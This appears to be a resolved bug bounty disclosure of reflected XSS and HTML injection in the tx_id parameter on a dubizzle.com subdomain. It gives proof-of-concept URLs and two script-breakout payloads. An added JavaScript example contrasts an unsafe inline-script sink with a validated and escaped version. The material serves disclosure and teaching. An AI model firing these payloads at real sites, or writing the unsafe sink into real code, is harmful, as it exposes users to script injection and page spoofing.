XSS and HTML Injection https://sharjah.dubizzle.com/
Medium
Vulnerability Details
Hi, Olx
Firstly, I saw that dubizzle.com is in your scope, so I've decided to report it.
PoC:
---------------------
1. Go to that link
2. Log in to your dubizzle account, XSS will execute
https://sharjah.dubizzle.com/place-an-ad/motors/used-cars/bmw/x5/new/?tx_id=9003650_53c48543e92c478cb165a53b39e48562%3C/script%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E
By the way, we can also use it for HTML injection, like this:
https://sharjah.dubizzle.com/place-an-ad/motors/used-cars/bmw/x5/new/?tx_id=9003650_53c48543e92c478cb165a53b39e48562%3C/script%3E%3Ch2%3EOUR%20SITE%20HAS%20BEEN%20DOWN%3C/h2%3E
Vulnerable Parameter
---------------------
```
?tx_id=
```
Payloads
---------------------
```
</script><h2>OUR SITE HAS BEEN DOWN</h2>
</script><script>prompt(document.domain)</script>
```
Testing
---------------------
Tested and confirmed on Firefox's latest version
If you have any questions, please let me know about it. Thanks!
Report Stats
- Report ID: 162296
- State: Closed
- Substate: resolved
- Upvotes: 3
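
Both payloads in the report begin with `</script>`, which suggests `tx_id` is reflected inside an inline script block. The following is an added example, not part of the report and not the site's code: it shows that assumed sink beside a hardened version. The `tx_id` format, the `var tx_id` variable and all function names are assumptions made for illustration.

```javascript
// Added example; not code from the report or from the site.
// Assumption: the page copies tx_id into an inline <script> block.

// Hypothetical allow-list modelled on the benign prefix of the reported value:
// digits, an underscore, then 32 lowercase hex characters.
const TX_ID_RE = /^[0-9]{1,12}_[0-9a-f]{32}$/;

function isValidTxId(value) {
  return typeof value === "string" && TX_ID_RE.test(value);
}

// Assumed vulnerable sink: the raw value is concatenated into the script body.
// The HTML parser ends the element at the first "</script>", whatever the
// JavaScript quoting around it looks like.
function renderUnsafe(txId) {
  return '<script>var tx_id = "' + txId + '";</script>';
}

// JSON.stringify quotes the value for JavaScript but leaves "<" untouched, so
// "</script>" would still close the element. Emit <, >, & and the two line
// separators as \uXXXX escapes, which the JS engine decodes back.
const SCRIPT_ESCAPES = {
  "<": "\\u003c", ">": "\\u003e", "&": "\\u0026",
  "\u2028": "\\u2028", "\u2029": "\\u2029",
};

function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/[<>&\u2028\u2029]/g, (ch) => SCRIPT_ESCAPES[ch]);
}

// Hardened sink: reject anything off-format, then encode for the script context.
function renderSafe(txId) {
  if (!isValidTxId(txId)) return null; // caller should answer 400
  return "<script>var tx_id = " + jsonForScript(txId) + ";</script>";
}

// Constructed input: the tx_id value from the report's first URL, URL-decoded.
const reported = decodeURIComponent(
  "9003650_53c48543e92c478cb165a53b39e48562" +
  "%3C/script%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E");

console.log(renderUnsafe(reported)); // script element is closed early
console.log(renderSafe(reported));   // null: rejected by the allow-list
console.log(jsonForScript(reported)); // no literal "<" or ">" remains
```

Validation and encoding are independent layers here: the encoder alone neutralises the breakout even for values that must carry arbitrary text, while the allow-list rejects malformed identifiers before they reach any template.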